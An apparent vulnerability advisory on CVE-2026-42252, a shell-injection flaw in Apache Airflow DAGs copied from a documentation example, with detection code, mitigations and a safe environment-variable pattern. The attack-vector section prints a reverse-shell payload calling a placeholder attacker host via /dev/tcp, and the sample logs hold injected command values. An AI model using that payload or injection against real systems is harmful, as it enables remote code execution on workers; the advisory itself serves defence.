CVE-2026-42252 Overview
CVE-2026-42252 affects Apache Airflow deployments whose DAG code was modeled on a vulnerable documentation example. The official documentation at core-concepts/dag-run.html showed a BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") pattern without shell-quoting or sanitization warnings. Authenticated users with Dag.can_trigger permission could inject shell metacharacters through the conf field of the trigger API. The injected payload reaches os.exec on the worker, enabling arbitrary command execution. This issue belongs to the same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. The vulnerability is tracked under [CWE-1336] (Improper Neutralization of Special Elements Used in a Template Engine).
Critical Impact
Authenticated trigger users can execute arbitrary commands on Airflow workers when DAG authors copied the pre-correction documentation example verbatim.
Affected Products
- Apache Airflow deployments using DAG code modeled on the pre-correction core-concepts/dag-run.html example
- Multi-team Airflow deployments where users hold Dag.can_trigger permission
- Hosted Airflow offerings exposing the trigger API to authenticated users
Discovery Timeline
- 2026-06-01 - CVE-2026-42252 published to NVD
- 2026-06-02 - Last updated in NVD database
Technical Details for CVE-2026-42252
Vulnerability Analysis
The root issue is a template-engine injection pattern propagated through official documentation. The Airflow docs presented a BashOperator example that interpolates dag_run.conf['conf1'] directly into a shell command string. Jinja templating replaces the placeholder with the raw user-supplied value before the shell parses the result. Any DAG built on this pattern accepts attacker-controlled input from the trigger API's conf payload and forwards it unsanitized to the worker shell. The exposure depends on a permission boundary that is routinely crossed in multi-team environments: holders of Dag.can_trigger are normally treated as low-privilege operational users, not as code-execution-equivalent identities.
Root Cause
The documentation example did not apply shell quoting or warn that dag_run.conf values are untrusted input. DAG authors copying the pattern produce a BashOperator whose bash_command is reconstructed at template-render time, mixing literal command text with attacker-controlled strings. Apache Airflow PR 64129 corrects the example to include explicit shell-quoting and a safety caveat, and the corrected docs ship with apache-airflow 3.2.2.
Attack Vector
An authenticated user with Dag.can_trigger on an affected DAG calls the trigger API and supplies a conf value containing shell metacharacters. A payload such as "; bash -i >& /dev/tcp/<attacker>/9999 0>&1; #" terminates the echo command, executes an attacker-controlled command, and comments out the trailing literal. The injected command runs in the worker process with the privileges of the Airflow worker, providing a foothold inside the orchestration plane. See the Apache Airflow PR 64129 for the documentation correction details.
No verified exploit code is published. The vulnerability is described in prose above; refer to PR 64129 for the corrected pattern and to the Apache mailing list thread for advisory context.
Detection Methods for CVE-2026-42252
Indicators of Compromise
- Trigger API requests where the conf JSON payload contains shell metacharacters such as ;, |, &, backticks, or $(.
- Worker process logs showing unexpected child processes spawned from BashOperator tasks, particularly shells with network sockets.
- Outbound network connections from Airflow worker hosts to unfamiliar IP addresses on high-numbered ports.
Detection Strategies
- Audit DAG source code for BashOperator instances whose bash_command interpolates dag_run.conf, params, or other user-controllable Jinja variables without shlex.quote or equivalent escaping.
- Inspect Airflow audit logs and dag_run records for conf payloads containing suspicious tokens, then correlate with worker task logs.
- Monitor Airflow REST API access logs for trigger calls originating from accounts that do not normally invoke them.
Monitoring Recommendations
- Forward Airflow webserver, scheduler, and worker logs to a centralized analytics platform and alert on shell-metacharacter patterns in conf fields.
- Baseline the set of processes a worker spawns per DAG and alert on deviations such as bash -i, nc, curl, or wget invocations.
- Track egress connections from worker hosts and flag any session to non-allowlisted destinations.
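The detection strategies above reduce to two checks: flag trigger conf payloads that carry shell metacharacters, and find BashOperator definitions that splice user-controlled Jinja variables into bash_command without quoting. The following is an added example (not code from the advisory or from the Airflow project) that implements both over constructed inputs: the audit-log line format, the sample DAG source and the filter names it treats as evidence of quoting (shell_quote, quote) are assumptions; Airflow ships no such filter by default, so a DAG would have to register one.

```python
import ast
import json
import re

# Shell metacharacters named in the IoC list above, plus newline (also a command separator).
SHELL_META = re.compile(r"[;|&`]|\$\(|\n")

# Jinja variables an API caller controls when triggering a run.
USER_CONTROLLED = ("dag_run.conf", "params")
# Filter names this auditor treats as evidence of quoting (assumed custom filters;
# Airflow has no built-in shell-quoting filter, so the DAG must register one).
QUOTING_MARKERS = ("shell_quote", "| quote")

# Constructed audit-log lines in an assumed "<ts> dag_id=<id> conf=<json>" format.
SAMPLE_LOG = [
    '2026-06-03T10:00:01Z dag_id=nightly_report conf={"conf1": "2026-06-02"}',
    '2026-06-03T10:04:17Z dag_id=nightly_report conf={"conf1": "2026-06-02; id"}',
    '2026-06-03T10:05:42Z dag_id=etl_load conf={"opts": {"mode": "full", "note": "run $(id)"}}',
    '2026-06-03T10:06:00Z dag_id=etl_load conf={"tags": ["a", "b`whoami`"]}',
]

# Constructed DAG source with one unsafe task, one quoted task and one env-var task.
SAMPLE_DAG = '''
from airflow.providers.standard.operators.bash import BashOperator

unsafe = BashOperator(
    task_id="echo_conf",
    bash_command="echo value: {{ dag_run.conf['conf1'] }}",
)
quoted = BashOperator(
    task_id="echo_quoted",
    bash_command="echo value: {{ dag_run.conf['conf1'] | shell_quote }}",
)
via_env = BashOperator(
    task_id="echo_env",
    bash_command='echo "value: $CONF1"',
    env={"CONF1": "{{ dag_run.conf['conf1'] }}"},
)
'''


def scan_conf(conf, path="conf"):
    """Return JSON paths of string values in a trigger conf payload that contain
    shell metacharacters. Recurses into nested objects and arrays."""
    hits = []
    if isinstance(conf, str):
        if SHELL_META.search(conf):
            hits.append(path)
    elif isinstance(conf, dict):
        for key, value in conf.items():
            hits.extend(scan_conf(value, f"{path}.{key}"))
    elif isinstance(conf, list):
        for i, value in enumerate(conf):
            hits.extend(scan_conf(value, f"{path}[{i}]"))
    return hits


def scan_dag_run_log(lines):
    """Run scan_conf over audit-log lines; return (dag_id, flagged_paths) per suspicious line."""
    findings = []
    for line in lines:
        m = re.search(r"dag_id=(\S+) conf=(\{.*\})$", line)
        if not m:
            continue
        paths = scan_conf(json.loads(m.group(2)))
        if paths:
            findings.append((m.group(1), paths))
    return findings


def audit_dag_source(source):
    """Static heuristic: find BashOperator(...) calls whose literal bash_command
    interpolates a user-controlled Jinja variable with no quoting filter.
    Returns (line_number, task_id) tuples; absence of findings is not proof of safety."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == "BashOperator"):
            continue
        kwargs = {kw.arg: kw.value for kw in node.keywords}
        cmd, task = kwargs.get("bash_command"), kwargs.get("task_id")
        if not (isinstance(cmd, ast.Constant) and isinstance(cmd.value, str)):
            continue  # non-literal command: review by hand
        if "{{" not in cmd.value or not any(v in cmd.value for v in USER_CONTROLLED):
            continue
        if any(q in cmd.value for q in QUOTING_MARKERS):
            continue
        task_id = task.value if isinstance(task, ast.Constant) else "<dynamic>"
        findings.append((node.lineno, task_id))
    return findings


if __name__ == "__main__":
    print(scan_dag_run_log(SAMPLE_LOG))
    print(audit_dag_source(SAMPLE_DAG))
```

The source auditor deliberately ignores the env-var task: its bash_command contains no Jinja expression, and the templated value lands in an environment variable rather than in command text, which is exactly the property the workarounds below rely on.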
How to Mitigate CVE-2026-42252
Immediate Actions Required
- Upgrade to apache-airflow 3.2.2 or later to obtain the corrected documentation, then align local DAG patterns with the safe example; the upgrade alone does not change existing DAG code.
- Review every BashOperator in production for untrusted Jinja interpolation and refactor to pass values through environment variables or shlex.quote.
- Restrict Dag.can_trigger to identities that are already trusted with code-execution-equivalent access on the worker.
Patch Information
The fix is documentation-level and ships in apache-airflow 3.2.2 via apache/airflow PR 64129. The corrected example demonstrates shell-quoting and adds an explicit safety caveat. Refer to the Apache mailing list discussion for advisory context.
Workarounds
- Replace inline Jinja interpolation with environment variables: pass dag_run.conf values via the env argument of BashOperator and reference them as "$CONF1" inside the command.
- Wrap any required interpolation in a quoting filter, e.g. {{ dag_run.conf['conf1'] | shell_quote }} (a custom filter backed by shlex.quote, registered through the DAG's user_defined_filters), or pre-process the value in a Python callable before passing it to the shell.
- Prefer PythonOperator or KubernetesPodOperator with parameterized arguments over BashOperator when handling externally supplied input.
Configuration example: safe BashOperator pattern using env vars. The templated value is delivered through the process environment, never spliced into the command text, so metacharacters in it are not parsed by the shell (import path shown for the Airflow 3 standard provider):

    from airflow.providers.standard.operators.bash import BashOperator

    task = BashOperator(
        task_id="echo_safe",
        # Double-quote the expansion so the value stays a single shell word.
        bash_command='echo "value: $CONF1"',
        # env is a templated field: the Jinja expression renders into the variable.
        env={"CONF1": "{{ dag_run.conf['conf1'] }}"},
        # env replaces the worker environment unless append_env=True; keep PATH etc.
        append_env=True,
    )
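To make the difference between the three patterns concrete, here is an added example (not code from the advisory or from Airflow) that renders the same benign, metacharacter-laden conf value through the pre-correction pattern, through shlex.quote, and through an environment variable, then runs each with /bin/sh. The conf value and the command strings are constructed; /bin/sh stands in for the bash -c BashOperator uses, and the shell_quote wiring mentioned in the docstring is the assumed user_defined_filters registration from the workaround above.

```python
import shlex
import subprocess

# Constructed conf value: benign, but carrying the separator an attacker would use.
HOSTILE_CONF1 = "hello; echo INJECTED"

# Minimal child environment; mirrors the fact that BashOperator's env argument
# replaces the worker environment unless append_env=True is set.
BASE_ENV = {"PATH": "/usr/bin:/bin"}

# Env-var pattern: the command text is fixed; the value arrives via $CONF1.
SAFE_ENV_COMMAND = 'echo "value: $CONF1"'


def render_unsafe(conf1):
    """The pre-correction documentation pattern: the rendered value becomes command text."""
    return f"echo value: {conf1}"


def render_quoted(conf1):
    """Hardened form: quote the value so the shell sees exactly one word.
    In a DAG this is what an assumed shell_quote filter does, registered with
    DAG(user_defined_filters={"shell_quote": shlex.quote})."""
    return f"echo value: {shlex.quote(conf1)}"


def run_sh(command, env=None):
    """Run a command string with /bin/sh (stand-in for bash -c) and return its stdout."""
    result = subprocess.run(["/bin/sh", "-c", command], env=env or BASE_ENV,
                            capture_output=True, text=True, check=True)
    return result.stdout


def demo():
    """Return stdout of each pattern for the same hostile value."""
    return {
        "unsafe": run_sh(render_unsafe(HOSTILE_CONF1)),
        "quoted": run_sh(render_quoted(HOSTILE_CONF1)),
        "env": run_sh(SAFE_ENV_COMMAND, env={**BASE_ENV, "CONF1": HOSTILE_CONF1}),
    }


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name:6}: {out!r}")
```

Only the unsafe rendering yields a second line of output: the shell split the command at the injected separator. In both hardened forms the entire value is echoed literally, separator included.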
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.